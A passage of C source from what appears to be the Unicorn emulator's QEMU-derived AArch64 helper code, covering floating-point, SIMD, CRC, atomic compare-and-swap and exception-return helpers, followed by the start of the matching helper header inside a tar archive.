((float32_is_zero(a) && float32_is_infinity(b)) || (float32_is_infinity(a) && float32_is_zero(b))) { /* 2.0 with the sign bit set to sign(A) XOR sign(B) */ return make_float32((1U << 30) | ((float32_val(a) ^ float32_val(b)) & (1U << 31))); } return float32_mul(a, b, fpst); } float64 HELPER(vfp_mulxd)(float64 a, float64 b, void *fpstp) { float_status *fpst = fpstp; a = float64_squash_input_denormal(a, fpst); b = float64_squash_input_denormal(b, fpst); if ((float64_is_zero(a) && float64_is_infinity(b)) || (float64_is_infinity(a) && float64_is_zero(b))) { /* 2.0 with the sign bit set to sign(A) XOR sign(B) */ return make_float64((1ULL << 62) | ((float64_val(a) ^ float64_val(b)) & (1ULL << 63))); } return float64_mul(a, b, fpst); } uint64_t HELPER(simd_tbl)(CPUARMState *env, uint64_t result, uint64_t indices, uint32_t rn, uint32_t numregs) { /* Helper function for SIMD TBL and TBX. We have to do the table * lookup part for the 64 bits worth of indices we're passed in. * result is the initial results vector (either zeroes for TBL * or some guest values for TBX), rn the register number where * the table starts, and numregs the number of registers in the table. * We return the results of the lookups. */ int shift; for (shift = 0; shift < 64; shift += 8) { int index = extract64(indices, shift, 8); if (index < 16 * numregs) { /* Convert index (a byte offset into the virtual table * which is a series of 128-bit vectors concatenated) * into the correct register element plus a bit offset * into that element, bearing in mind that the table * can wrap around from V31 to V0. */ int elt = (rn * 2 + (index >> 3)) % 64; int bitidx = (index & 7) * 8; uint64_t *q = aa64_vfp_qreg(env, elt >> 1); uint64_t val = extract64(q[elt & 1], bitidx, 8); result = deposit64(result, shift, 8, val); } } return result; } /* 64bit/double versions of the neon float compare functions */ uint64_t HELPER(neon_ceq_f64)(float64 a, float64 b, void *fpstp) { float_status *fpst = fpstp; return -float64_eq_quiet(a, b, fpst); } uint64_t HELPER(neon_cge_f64)(float64 a, float64 b, void *fpstp) { float_status *fpst = fpstp; return -float64_le(b, a, fpst); } uint64_t HELPER(neon_cgt_f64)(float64 a, float64 b, void *fpstp) { float_status *fpst = fpstp; return -float64_lt(b, a, fpst); } /* Reciprocal step and sqrt step. Note that unlike the A32/T32 * versions, these do a fully fused multiply-add or * multiply-add-and-halve. */ #define float16_two make_float16(0x4000) #define float16_three make_float16(0x4200) #define float16_one_point_five make_float16(0x3e00) #define float32_two make_float32(0x40000000) #define float32_three make_float32(0x40400000) #define float32_one_point_five make_float32(0x3fc00000) #define float64_two make_float64(0x4000000000000000ULL) #define float64_three make_float64(0x4008000000000000ULL) #define float64_one_point_five make_float64(0x3FF8000000000000ULL) uint32_t HELPER(recpsf_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; a = float16_squash_input_denormal(a, fpst); b = float16_squash_input_denormal(b, fpst); a = float16_chs(a); if ((float16_is_infinity(a) && float16_is_zero(b)) || (float16_is_infinity(b) && float16_is_zero(a))) { return float16_two; } return float16_muladd(a, b, float16_two, 0, fpst); } float32 HELPER(recpsf_f32)(float32 a, float32 b, void *fpstp) { float_status *fpst = fpstp; a = float32_squash_input_denormal(a, fpst); b = float32_squash_input_denormal(b, fpst); a = float32_chs(a); if ((float32_is_infinity(a) && float32_is_zero(b)) || (float32_is_infinity(b) && float32_is_zero(a))) { return float32_two; } return float32_muladd(a, b, float32_two, 0, fpst); } float64 HELPER(recpsf_f64)(float64 a, float64 b, void *fpstp) { float_status *fpst = fpstp; a = float64_squash_input_denormal(a, fpst); b = float64_squash_input_denormal(b, fpst); a = float64_chs(a); if ((float64_is_infinity(a) && float64_is_zero(b)) || (float64_is_infinity(b) && float64_is_zero(a))) { return float64_two; } return float64_muladd(a, b, float64_two, 0, fpst); } uint32_t HELPER(rsqrtsf_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; a = float16_squash_input_denormal(a, fpst); b = float16_squash_input_denormal(b, fpst); a = float16_chs(a); if ((float16_is_infinity(a) && float16_is_zero(b)) || (float16_is_infinity(b) && float16_is_zero(a))) { return float16_one_point_five; } return float16_muladd(a, b, float16_three, float_muladd_halve_result, fpst); } float32 HELPER(rsqrtsf_f32)(float32 a, float32 b, void *fpstp) { float_status *fpst = fpstp; a = float32_squash_input_denormal(a, fpst); b = float32_squash_input_denormal(b, fpst); a = float32_chs(a); if ((float32_is_infinity(a) && float32_is_zero(b)) || (float32_is_infinity(b) && float32_is_zero(a))) { return float32_one_point_five; } return float32_muladd(a, b, float32_three, float_muladd_halve_result, fpst); } float64 HELPER(rsqrtsf_f64)(float64 a, float64 b, void *fpstp) { float_status *fpst = fpstp; a = float64_squash_input_denormal(a, fpst); b = float64_squash_input_denormal(b, fpst); a = float64_chs(a); if ((float64_is_infinity(a) && float64_is_zero(b)) || (float64_is_infinity(b) && float64_is_zero(a))) { return float64_one_point_five; } return float64_muladd(a, b, float64_three, float_muladd_halve_result, fpst); } /* Pairwise long add: add pairs of adjacent elements into * double-width elements in the result (eg _s8 is an 8x8->16 op) */ uint64_t HELPER(neon_addlp_s8)(uint64_t a) { uint64_t nsignmask = 0x0080008000800080ULL; uint64_t wsignmask = 0x8000800080008000ULL; uint64_t elementmask = 0x00ff00ff00ff00ffULL; uint64_t tmp1, tmp2; uint64_t res, signres; /* Extract odd elements, sign extend each to a 16 bit field */ tmp1 = a & elementmask; tmp1 ^= nsignmask; tmp1 |= wsignmask; tmp1 = (tmp1 - nsignmask) ^ wsignmask; /* Ditto for the even elements */ tmp2 = (a >> 8) & elementmask; tmp2 ^= nsignmask; tmp2 |= wsignmask; tmp2 = (tmp2 - nsignmask) ^ wsignmask; /* calculate the result by summing bits 0..14, 16..22, etc, * and then adjusting the sign bits 15, 23, etc manually. * This ensures the addition can't overflow the 16 bit field. */ signres = (tmp1 ^ tmp2) & wsignmask; res = (tmp1 & ~wsignmask) + (tmp2 & ~wsignmask); res ^= signres; return res; } uint64_t HELPER(neon_addlp_u8)(uint64_t a) { uint64_t tmp; tmp = a & 0x00ff00ff00ff00ffULL; tmp += (a >> 8) & 0x00ff00ff00ff00ffULL; return tmp; } uint64_t HELPER(neon_addlp_s16)(uint64_t a) { int32_t reslo, reshi; reslo = (int32_t)(int16_t)a + (int32_t)(int16_t)(a >> 16); reshi = (int32_t)(int16_t)(a >> 32) + (int32_t)(int16_t)(a >> 48); return (uint32_t)reslo | (((uint64_t)reshi) << 32); } uint64_t HELPER(neon_addlp_u16)(uint64_t a) { uint64_t tmp; tmp = a & 0x0000ffff0000ffffULL; tmp += (a >> 16) & 0x0000ffff0000ffffULL; return tmp; } /* Floating-point reciprocal exponent - see FPRecpX in ARM ARM */ uint32_t HELPER(frecpx_f16)(uint32_t a, void *fpstp) { float_status *fpst = fpstp; uint16_t val16, sbit; int16_t exp; if (float16_is_any_nan(a)) { float16 nan = a; if (float16_is_signaling_nan(a, fpst)) { float_raise(float_flag_invalid, fpst); nan = float16_silence_nan(a, fpst); } if (fpst->default_nan_mode) { nan = float16_default_nan(fpst); } return nan; } a = float16_squash_input_denormal(a, fpst); val16 = float16_val(a); sbit = 0x8000 & val16; exp = extract32(val16, 10, 5); if (exp == 0) { return make_float16(deposit32(sbit, 10, 5, 0x1e)); } else { return make_float16(deposit32(sbit, 10, 5, ~exp)); } } float32 HELPER(frecpx_f32)(float32 a, void *fpstp) { float_status *fpst = fpstp; uint32_t val32, sbit; int32_t exp; if (float32_is_any_nan(a)) { float32 nan = a; if (float32_is_signaling_nan(a, fpst)) { float_raise(float_flag_invalid, fpst); nan = float32_silence_nan(a, fpst); } if (fpst->default_nan_mode) { nan = float32_default_nan(fpst); } return nan; } a = float32_squash_input_denormal(a, fpst); val32 = float32_val(a); sbit = 0x80000000ULL & val32; exp = extract32(val32, 23, 8); if (exp == 0) { return make_float32(sbit | (0xfe << 23)); } else { return make_float32(sbit | (~exp & 0xff) << 23); } } float64 HELPER(frecpx_f64)(float64 a, void *fpstp) { float_status *fpst = fpstp; uint64_t val64, sbit; int64_t exp; if (float64_is_any_nan(a)) { float64 nan = a; if (float64_is_signaling_nan(a, fpst)) { float_raise(float_flag_invalid, fpst); nan = float64_silence_nan(a, fpst); } if (fpst->default_nan_mode) { nan = float64_default_nan(fpst); } return nan; } a = float64_squash_input_denormal(a, fpst); val64 = float64_val(a); sbit = 0x8000000000000000ULL & val64; exp = extract64(float64_val(a), 52, 11); if (exp == 0) { return make_float64(sbit | (0x7feULL << 52)); } else { return make_float64(sbit | (~exp & 0x7ffULL) << 52); } } float32 HELPER(fcvtx_f64_to_f32)(float64 a, CPUARMState *env) { /* Von Neumann rounding is implemented by using round-to-zero * and then setting the LSB of the result if Inexact was raised. */ float32 r; float_status *fpst = &env->vfp.fp_status; float_status tstat = *fpst; int exflags; set_float_rounding_mode(float_round_to_zero, &tstat); set_float_exception_flags(0, &tstat); r = float64_to_float32(a, &tstat); exflags = get_float_exception_flags(&tstat); if (exflags & float_flag_inexact) { r = make_float32(float32_val(r) | 1); } exflags |= get_float_exception_flags(fpst); set_float_exception_flags(exflags, fpst); return r; } /* 64-bit versions of the CRC helpers. Note that although the operation * (and the prototypes of crc32c() and crc32() mean that only the bottom * 32 bits of the accumulator and result are used, we pass and return * uint64_t for convenience of the generated code. Unlike the 32-bit * instruction set versions, val may genuinely have 64 bits of data in it. * The upper bytes of val (above the number specified by 'bytes') must have * been zeroed out by the caller. */ uint64_t HELPER(crc32_64)(uint64_t acc, uint64_t val, uint32_t bytes) { uint8_t buf[8]; stq_le_p(buf, val); return crc32(acc ^ 0xffffffff, buf, bytes) ^ 0xffffffff; } uint64_t HELPER(crc32c_64)(uint64_t acc, uint64_t val, uint32_t bytes) { uint8_t buf[8]; stq_le_p(buf, val); /* Linux crc32c converts the output to one's complement. */ return crc32c(acc, buf, bytes) ^ 0xffffffff; } uint64_t HELPER(paired_cmpxchg64_le)(CPUARMState *env, uint64_t addr, uint64_t new_lo, uint64_t new_hi) { Int128 cmpv = int128_make128(env->exclusive_val, env->exclusive_high); Int128 newv = int128_make128(new_lo, new_hi); Int128 oldv; uintptr_t ra = GETPC(); uint64_t o0, o1; bool success; int mem_idx = cpu_mmu_index(env, false); TCGMemOpIdx oi0 = make_memop_idx(MO_LEQ | MO_ALIGN_16, mem_idx); TCGMemOpIdx oi1 = make_memop_idx(MO_LEQ, mem_idx); o0 = helper_le_ldq_mmu(env, addr + 0, oi0, ra); o1 = helper_le_ldq_mmu(env, addr + 8, oi1, ra); oldv = int128_make128(o0, o1); success = int128_eq(oldv, cmpv); if (success) { helper_le_stq_mmu(env, addr + 0, int128_getlo(newv), oi1, ra); helper_le_stq_mmu(env, addr + 8, int128_gethi(newv), oi1, ra); } return !success; } uint64_t HELPER(paired_cmpxchg64_le_parallel)(CPUARMState *env, uint64_t addr, uint64_t new_lo, uint64_t new_hi) { Int128 oldv, cmpv, newv; uintptr_t ra = GETPC(); bool success; int mem_idx; TCGMemOpIdx oi; assert(HAVE_CMPXCHG128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_LEQ | MO_ALIGN_16, mem_idx); cmpv = int128_make128(env->exclusive_val, env->exclusive_high); newv = int128_make128(new_lo, new_hi); oldv = helper_atomic_cmpxchgo_le_mmu(env, addr, cmpv, newv, oi, ra); success = int128_eq(oldv, cmpv); return !success; } uint64_t HELPER(paired_cmpxchg64_be)(CPUARMState *env, uint64_t addr, uint64_t new_lo, uint64_t new_hi) { /* * High and low need to be switched here because this is not actually a * 128bit store but two doublewords stored consecutively */ Int128 cmpv = int128_make128(env->exclusive_high, env->exclusive_val); Int128 newv = int128_make128(new_hi, new_lo); Int128 oldv; uintptr_t ra = GETPC(); uint64_t o0, o1; bool success; int mem_idx = cpu_mmu_index(env, false); TCGMemOpIdx oi0 = make_memop_idx(MO_BEQ | MO_ALIGN_16, mem_idx); TCGMemOpIdx oi1 = make_memop_idx(MO_BEQ, mem_idx); o1 = helper_be_ldq_mmu(env, addr + 0, oi0, ra); o0 = helper_be_ldq_mmu(env, addr + 8, oi1, ra); oldv = int128_make128(o0, o1); success = int128_eq(oldv, cmpv); if (success) { helper_be_stq_mmu(env, addr + 0, int128_gethi(newv), oi1, ra); helper_be_stq_mmu(env, addr + 8, int128_getlo(newv), oi1, ra); } return !success; } uint64_t HELPER(paired_cmpxchg64_be_parallel)(CPUARMState *env, uint64_t addr, uint64_t new_lo, uint64_t new_hi) { Int128 oldv, cmpv, newv; uintptr_t ra = GETPC(); bool success; int mem_idx; TCGMemOpIdx oi; assert(HAVE_CMPXCHG128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_BEQ | MO_ALIGN_16, mem_idx); /* * High and low need to be switched here because this is not actually a * 128bit store but two doublewords stored consecutively */ cmpv = int128_make128(env->exclusive_high, env->exclusive_val); newv = int128_make128(new_hi, new_lo); oldv = helper_atomic_cmpxchgo_be_mmu(env, addr, cmpv, newv, oi, ra); success = int128_eq(oldv, cmpv); return !success; } /* Writes back the old data into Rs. */ void HELPER(casp_le_parallel)(CPUARMState *env, uint32_t rs, uint64_t addr, uint64_t new_lo, uint64_t new_hi) { Int128 oldv, cmpv, newv; uintptr_t ra = GETPC(); int mem_idx; TCGMemOpIdx oi; assert(HAVE_CMPXCHG128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_LEQ | MO_ALIGN_16, mem_idx); cmpv = int128_make128(env->xregs[rs], env->xregs[rs + 1]); newv = int128_make128(new_lo, new_hi); oldv = helper_atomic_cmpxchgo_le_mmu(env, addr, cmpv, newv, oi, ra); env->xregs[rs] = int128_getlo(oldv); env->xregs[rs + 1] = int128_gethi(oldv); } void HELPER(casp_be_parallel)(CPUARMState *env, uint32_t rs, uint64_t addr, uint64_t new_hi, uint64_t new_lo) { Int128 oldv, cmpv, newv; uintptr_t ra = GETPC(); int mem_idx; TCGMemOpIdx oi; assert(HAVE_CMPXCHG128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_LEQ | MO_ALIGN_16, mem_idx); cmpv = int128_make128(env->xregs[rs + 1], env->xregs[rs]); newv = int128_make128(new_lo, new_hi); oldv = helper_atomic_cmpxchgo_be_mmu(env, addr, cmpv, newv, oi, ra); env->xregs[rs + 1] = int128_getlo(oldv); env->xregs[rs] = int128_gethi(oldv); } /* * AdvSIMD half-precision */ #define ADVSIMD_HELPER(name, suffix) HELPER(glue(glue(advsimd_, name), suffix)) #define ADVSIMD_HALFOP(name) \ uint32_t ADVSIMD_HELPER(name, h)(uint32_t a, uint32_t b, void *fpstp) \ { \ float_status *fpst = fpstp; \ return float16_ ## name(a, b, fpst); \ } ADVSIMD_HALFOP(add) ADVSIMD_HALFOP(sub) ADVSIMD_HALFOP(mul) ADVSIMD_HALFOP(div) ADVSIMD_HALFOP(min) ADVSIMD_HALFOP(max) ADVSIMD_HALFOP(minnum) ADVSIMD_HALFOP(maxnum) #define ADVSIMD_TWOHALFOP(name) \ uint32_t ADVSIMD_HELPER(name, 2h)(uint32_t two_a, uint32_t two_b, void *fpstp) \ { \ float16 a1, a2, b1, b2; \ uint32_t r1, r2; \ float_status *fpst = fpstp; \ a1 = extract32(two_a, 0, 16); \ a2 = extract32(two_a, 16, 16); \ b1 = extract32(two_b, 0, 16); \ b2 = extract32(two_b, 16, 16); \ r1 = float16_ ## name(a1, b1, fpst); \ r2 = float16_ ## name(a2, b2, fpst); \ return deposit32(r1, 16, 16, r2); \ } ADVSIMD_TWOHALFOP(add) ADVSIMD_TWOHALFOP(sub) ADVSIMD_TWOHALFOP(mul) ADVSIMD_TWOHALFOP(div) ADVSIMD_TWOHALFOP(min) ADVSIMD_TWOHALFOP(max) ADVSIMD_TWOHALFOP(minnum) ADVSIMD_TWOHALFOP(maxnum) /* Data processing - scalar floating-point and advanced SIMD */ static float16 float16_mulx(float16 a, float16 b, void *fpstp) { float_status *fpst = fpstp; a = float16_squash_input_denormal(a, fpst); b = float16_squash_input_denormal(b, fpst); if ((float16_is_zero(a) && float16_is_infinity(b)) || (float16_is_infinity(a) && float16_is_zero(b))) { /* 2.0 with the sign bit set to sign(A) XOR sign(B) */ return make_float16((1U << 14) | ((float16_val(a) ^ float16_val(b)) & (1U << 15))); } return float16_mul(a, b, fpst); } ADVSIMD_HALFOP(mulx) ADVSIMD_TWOHALFOP(mulx) /* fused multiply-accumulate */ uint32_t HELPER(advsimd_muladdh)(uint32_t a, uint32_t b, uint32_t c, void *fpstp) { float_status *fpst = fpstp; return float16_muladd(a, b, c, 0, fpst); } uint32_t HELPER(advsimd_muladd2h)(uint32_t two_a, uint32_t two_b, uint32_t two_c, void *fpstp) { float_status *fpst = fpstp; float16 a1, a2, b1, b2, c1, c2; uint32_t r1, r2; a1 = extract32(two_a, 0, 16); a2 = extract32(two_a, 16, 16); b1 = extract32(two_b, 0, 16); b2 = extract32(two_b, 16, 16); c1 = extract32(two_c, 0, 16); c2 = extract32(two_c, 16, 16); r1 = float16_muladd(a1, b1, c1, 0, fpst); r2 = float16_muladd(a2, b2, c2, 0, fpst); return deposit32(r1, 16, 16, r2); } /* * Floating point comparisons produce an integer result. Softfloat * routines return float_relation types which we convert to the 0/-1 * Neon requires. */ #define ADVSIMD_CMPRES(test) (test) ? 0xffff : 0 uint32_t HELPER(advsimd_ceq_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; int compare = float16_compare_quiet(a, b, fpst); return ADVSIMD_CMPRES(compare == float_relation_equal); } uint32_t HELPER(advsimd_cge_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; int compare = float16_compare(a, b, fpst); return ADVSIMD_CMPRES(compare == float_relation_greater || compare == float_relation_equal); } uint32_t HELPER(advsimd_cgt_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; int compare = float16_compare(a, b, fpst); return ADVSIMD_CMPRES(compare == float_relation_greater); } uint32_t HELPER(advsimd_acge_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; float16 f0 = float16_abs(a); float16 f1 = float16_abs(b); int compare = float16_compare(f0, f1, fpst); return ADVSIMD_CMPRES(compare == float_relation_greater || compare == float_relation_equal); } uint32_t HELPER(advsimd_acgt_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; float16 f0 = float16_abs(a); float16 f1 = float16_abs(b); int compare = float16_compare(f0, f1, fpst); return ADVSIMD_CMPRES(compare == float_relation_greater); } /* round to integral */ uint32_t HELPER(advsimd_rinth_exact)(uint32_t x, void *fp_status) { return float16_round_to_int(x, fp_status); } uint32_t HELPER(advsimd_rinth)(uint32_t x, void *fp_status) { int old_flags = get_float_exception_flags(fp_status), new_flags; float16 ret; ret = float16_round_to_int(x, fp_status); /* Suppress any inexact exceptions the conversion produced */ if (!(old_flags & float_flag_inexact)) { new_flags = get_float_exception_flags(fp_status); set_float_exception_flags(new_flags & ~float_flag_inexact, fp_status); } return ret; } /* * Half-precision floating point conversion functions * * There are a multitude of conversion functions with various * different rounding modes. This is dealt with by the calling code * setting the mode appropriately before calling the helper. */ uint32_t HELPER(advsimd_f16tosinth)(uint32_t a, void *fpstp) { float_status *fpst = fpstp; /* Invalid if we are passed a NaN */ if (float16_is_any_nan(a)) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_int16(a, fpst); } uint32_t HELPER(advsimd_f16touinth)(uint32_t a, void *fpstp) { float_status *fpst = fpstp; /* Invalid if we are passed a NaN */ if (float16_is_any_nan(a)) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_uint16(a, fpst); } static int el_from_spsr(uint32_t spsr) { /* Return the exception level that this SPSR is requesting a return to, * or -1 if it is invalid (an illegal return) */ if (spsr & PSTATE_nRW) { switch (spsr & CPSR_M) { case ARM_CPU_MODE_USR: return 0; case ARM_CPU_MODE_HYP: return 2; case ARM_CPU_MODE_FIQ: case ARM_CPU_MODE_IRQ: case ARM_CPU_MODE_SVC: case ARM_CPU_MODE_ABT: case ARM_CPU_MODE_UND: case ARM_CPU_MODE_SYS: return 1; case ARM_CPU_MODE_MON: /* Returning to Mon from AArch64 is never possible, * so this is an illegal return. */ default: return -1; } } else { if (extract32(spsr, 1, 1)) { /* Return with reserved M[1] bit set */ return -1; } if (extract32(spsr, 0, 4) == 1) { /* return to EL0 with M[0] bit set */ return -1; } return extract32(spsr, 2, 2); } } void HELPER(exception_return)(CPUARMState *env, uint64_t new_pc) { int cur_el = arm_current_el(env); unsigned int spsr_idx = aarch64_banked_spsr_index(cur_el); uint32_t mask, spsr = env->banked_spsr[spsr_idx]; int new_el; bool return_to_aa64 = (spsr & PSTATE_nRW) == 0; aarch64_save_sp(env, cur_el); arm_clear_exclusive(env); /* We must squash the PSTATE.SS bit to zero unless both of the * following hold: * 1. debug exceptions are currently disabled * 2. singlestep will be active in the EL we return to * We check 1 here and 2 after we've done the pstate/cpsr write() to * transition to the EL we're going to. */ if (arm_generate_debug_exceptions(env)) { spsr &= ~PSTATE_SS; } new_el = el_from_spsr(spsr); if (new_el == -1) { goto illegal_return; } if (new_el > cur_el || (new_el == 2 && !arm_feature(env, ARM_FEATURE_EL2))) { /* Disallow return to an EL which is unimplemented or higher * than the current one. */ goto illegal_return; } if (new_el != 0 && arm_el_is_aa64(env, new_el) != return_to_aa64) { /* Return to an EL which is configured for a different register width */ goto illegal_return; } if (new_el == 2 && arm_is_secure_below_el3(env)) { /* Return to the non-existent secure-EL2 */ goto illegal_return; } if (new_el == 1 && (arm_hcr_el2_eff(env) & HCR_TGE)) { goto illegal_return; } arm_call_pre_el_change_hook(env_archcpu(env)); if (!return_to_aa64) { env->aarch64 = 0; /* We do a raw CPSR write because aarch64_sync_64_to_32() * will sort the register banks out for us, and we've already * caught all the bad-mode cases in el_from_spsr(). */ mask = aarch32_cpsr_valid_mask(env->features, &env_archcpu(env)->isar); cpsr_write(env, spsr, mask, CPSRWriteRaw); if (!arm_singlestep_active(env)) { env->uncached_cpsr &= ~PSTATE_SS; } aarch64_sync_64_to_32(env); if (spsr & CPSR_T) { env->regs[15] = new_pc & ~0x1; } else { env->regs[15] = new_pc & ~0x3; } helper_rebuild_hflags_a32(env, new_el); qemu_log_mask(CPU_LOG_INT, "Exception return from AArch64 EL%d to " "AArch32 EL%d PC 0x%" PRIx32 "\n", cur_el, new_el, env->regs[15]); } else { int tbii; env->aarch64 = 1; spsr &= aarch64_pstate_valid_mask(&env_archcpu(env)->isar); pstate_write(env, spsr); if (!arm_singlestep_active(env)) { env->pstate &= ~PSTATE_SS; } aarch64_restore_sp(env, new_el); helper_rebuild_hflags_a64(env, new_el); /* * Apply TBI to the exception return address. We had to delay this * until after we selected the new EL, so that we could select the * correct TBI+TBID bits. This is made easier by waiting until after * the hflags rebuild, since we can pull the composite TBII field * from there. */ tbii = FIELD_EX32(env->hflags, TBFLAG_A64, TBII); if ((tbii >> extract64(new_pc, 55, 1)) & 1) { /* TBI is enabled. */ int core_mmu_idx = cpu_mmu_index(env, false); if (regime_has_2_ranges(core_to_aa64_mmu_idx(core_mmu_idx))) { new_pc = sextract64(new_pc, 0, 56); } else { new_pc = extract64(new_pc, 0, 56); } } env->pc = new_pc; qemu_log_mask(CPU_LOG_INT, "Exception return from AArch64 EL%d to " "AArch64 EL%d PC 0x%" PRIx64 "\n", cur_el, new_el, env->pc); } /* * Note that cur_el can never be 0. If new_el is 0, then * el0_a64 is return_to_aa64, else el0_a64 is ignored. */ aarch64_sve_change_el(env, cur_el, new_el, return_to_aa64); arm_call_el_change_hook(env_archcpu(env)); return; illegal_return: /* Illegal return events of various kinds have architecturally * mandated behaviour: * restore NZCV and DAIF from SPSR_ELx * set PSTATE.IL * restore PC from ELR_ELx * no change to exception level, execution state or stack pointer */ env->pstate |= PSTATE_IL; env->pc = new_pc; spsr &= PSTATE_NZCV | PSTATE_DAIF; spsr |= pstate_read(env) & ~(PSTATE_NZCV | PSTATE_DAIF); pstate_write(env, spsr); if (!arm_singlestep_active(env)) { env->pstate &= ~PSTATE_SS; } qemu_log_mask(LOG_GUEST_ERROR, "Illegal exception return at EL%d: " "resuming execution at 0x%" PRIx64 "\n", cur_el, env->pc); } /* * Square Root and Reciprocal square root */ uint32_t HELPER(sqrt_f16)(uint32_t a, void *fpstp) { float_status *s = fpstp; return float16_sqrt(a, s); } void HELPER(dc_zva)(CPUARMState *env, uint64_t vaddr_in) { /* * Implement DC ZVA, which zeroes a fixed-length block of memory. * Note that we do not implement the (architecturally mandated) * alignment fault for attempts to use this on Device memory * (which matches the usual QEMU behaviour of not implementing either * alignment faults or any memory attribute handling). */ struct uc_struct *uc = env->uc; ARMCPU *cpu = env_archcpu(env); uint64_t blocklen = 4 << cpu->dcz_blocksize; uint64_t vaddr = vaddr_in & ~(blocklen - 1); /* * Slightly awkwardly, QEMU's TARGET_PAGE_SIZE may be less than * the block size so we might have to do more than one TLB lookup. * We know that in fact for any v8 CPU the page size is at least 4K * and the block size must be 2K or less, but TARGET_PAGE_SIZE is only * 1K as an artefact of legacy v5 subpage support being present in the * same QEMU executable. So in practice the hostaddr[] array has * two entries, given the current setting of TARGET_PAGE_BITS_MIN. */ int maxidx = DIV_ROUND_UP(blocklen, TARGET_PAGE_SIZE); void *hostaddr[DIV_ROUND_UP(2 * KiB, 1 << TARGET_PAGE_BITS_MIN)]; int try, i; unsigned mmu_idx = cpu_mmu_index(env, false); TCGMemOpIdx oi = make_memop_idx(MO_UB, mmu_idx); assert(maxidx <= ARRAY_SIZE(hostaddr)); for (try = 0; try < 2; try++) { for (i = 0; i < maxidx; i++) { hostaddr[i] = tlb_vaddr_to_host(env, vaddr + TARGET_PAGE_SIZE * i, 1, mmu_idx); if (!hostaddr[i]) { break; } } if (i == maxidx) { /* * If it's all in the TLB it's fair game for just writing to; * we know we don't need to update dirty status, etc. */ for (i = 0; i < maxidx - 1; i++) { memset(hostaddr[i], 0, TARGET_PAGE_SIZE); } memset(hostaddr[i], 0, blocklen - (i * TARGET_PAGE_SIZE)); return; } /* * OK, try a store and see if we can populate the tlb. This * might cause an exception if the memory isn't writable, * in which case we will longjmp out of here. We must for * this purpose use the actual register value passed to us * so that we get the fault address right. */ helper_ret_stb_mmu(env, vaddr_in, 0, oi, GETPC()); /* Now we can populate the other TLB entries, if any */ for (i = 0; i < maxidx; i++) { uint64_t va = vaddr + TARGET_PAGE_SIZE * i; if (va != (vaddr_in & TARGET_PAGE_MASK)) { helper_ret_stb_mmu(env, va, 0, oi, GETPC()); } } } /* * Slow path (probably attempt to do this to an I/O device or * similar, or clearing of a block of code we have translations * cached for). Just do a series of byte writes as the architecture * demands. It's not worth trying to use a cpu_physical_memory_map(), * memset(), unmap() sequence here because: * + we'd need to account for the blocksize being larger than a page * + the direct-RAM access case is almost always going to be dealt * with in the fastpath code above, so there's no speed benefit * + we would have to deal with the map returning NULL because the * bounce buffer was in use */ for (i = 0; i < blocklen; i++) { helper_ret_stb_mmu(env, vaddr + i, 0, oi, GETPC()); } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/helper-a64.h����������������������������������������������������������0000664�0000000�0000000�00000013106�14675241067�0020241�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * AArch64 specific helper definitions * * Copyright (c) 2013 Alexander Graf <agraf@suse.de> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ DEF_HELPER_FLAGS_2(udiv64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(sdiv64, TCG_CALL_NO_RWG_SE, s64, s64, s64) DEF_HELPER_FLAGS_1(rbit64, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_2(msr_i_spsel, void, env, i32) DEF_HELPER_2(msr_i_daifset, void, env, i32) DEF_HELPER_2(msr_i_daifclear, void, env, i32) DEF_HELPER_3(vfp_cmph_a64, i64, f16, f16, ptr) DEF_HELPER_3(vfp_cmpeh_a64, i64, f16, f16, ptr) DEF_HELPER_3(vfp_cmps_a64, i64, f32, f32, ptr) DEF_HELPER_3(vfp_cmpes_a64, i64, f32, f32, ptr) DEF_HELPER_3(vfp_cmpd_a64, i64, f64, f64, ptr) DEF_HELPER_3(vfp_cmped_a64, i64, f64, f64, ptr) DEF_HELPER_FLAGS_5(simd_tbl, TCG_CALL_NO_RWG_SE, i64, env, i64, i64, i32, i32) DEF_HELPER_FLAGS_3(vfp_mulxs, TCG_CALL_NO_RWG, f32, f32, f32, ptr) DEF_HELPER_FLAGS_3(vfp_mulxd, TCG_CALL_NO_RWG, f64, f64, f64, ptr) DEF_HELPER_FLAGS_3(neon_ceq_f64, TCG_CALL_NO_RWG, i64, i64, i64, ptr) DEF_HELPER_FLAGS_3(neon_cge_f64, TCG_CALL_NO_RWG, i64, i64, i64, ptr) DEF_HELPER_FLAGS_3(neon_cgt_f64, TCG_CALL_NO_RWG, i64, i64, i64, ptr) DEF_HELPER_FLAGS_3(recpsf_f16, TCG_CALL_NO_RWG, f16, f16, f16, ptr) DEF_HELPER_FLAGS_3(recpsf_f32, TCG_CALL_NO_RWG, f32, f32, f32, ptr) DEF_HELPER_FLAGS_3(recpsf_f64, TCG_CALL_NO_RWG, f64, f64, f64, ptr) DEF_HELPER_FLAGS_3(rsqrtsf_f16, TCG_CALL_NO_RWG, f16, f16, f16, ptr) 